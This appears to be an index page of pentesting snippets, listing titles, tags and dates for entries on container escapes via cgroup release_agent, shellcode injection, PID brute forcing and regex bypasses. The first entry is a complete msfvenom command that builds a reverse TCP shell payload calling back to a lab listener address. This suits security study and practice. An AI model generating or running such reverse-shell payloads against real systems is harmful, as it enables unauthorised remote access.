msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py
Pentest
Jun 28, 2024 1:28 PM
Inject the shellcode into the running process byte by byte.
Pentest
Exploit Development
Jun 28, 2024 1:28 PM
Create the non-priv user of the host inside the container
OS
ContainerizationDockerSecurity
Jul 1, 2024 11:13 AM
Brute force the host PID until the output path is created, or we run out of guesses
Pentest
Brute Force
Jun 25, 2024 2:16 PM
Executes the attack by spawning a process that immediately ends inside the 'x' child cgroup
Red Team
Cybersecurity
Jun 25, 2024 2:16 PM
Disable special builtins chars so you can abuse them as scripts
Languages
Scripting
Jun 25, 2024 2:16 PM
A regex that only allows letters and numbers might be vulnerable to new line characters
Languages
Regex
Jul 1, 2024 11:50 AM
ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
Network
SSH
Jun 25, 2024 2:16 PM
release_agent exploit - Relative Paths to PIDs
ConceptOS
Privilege EscalationExploitLinux
Jun 25, 2024 2:16 PM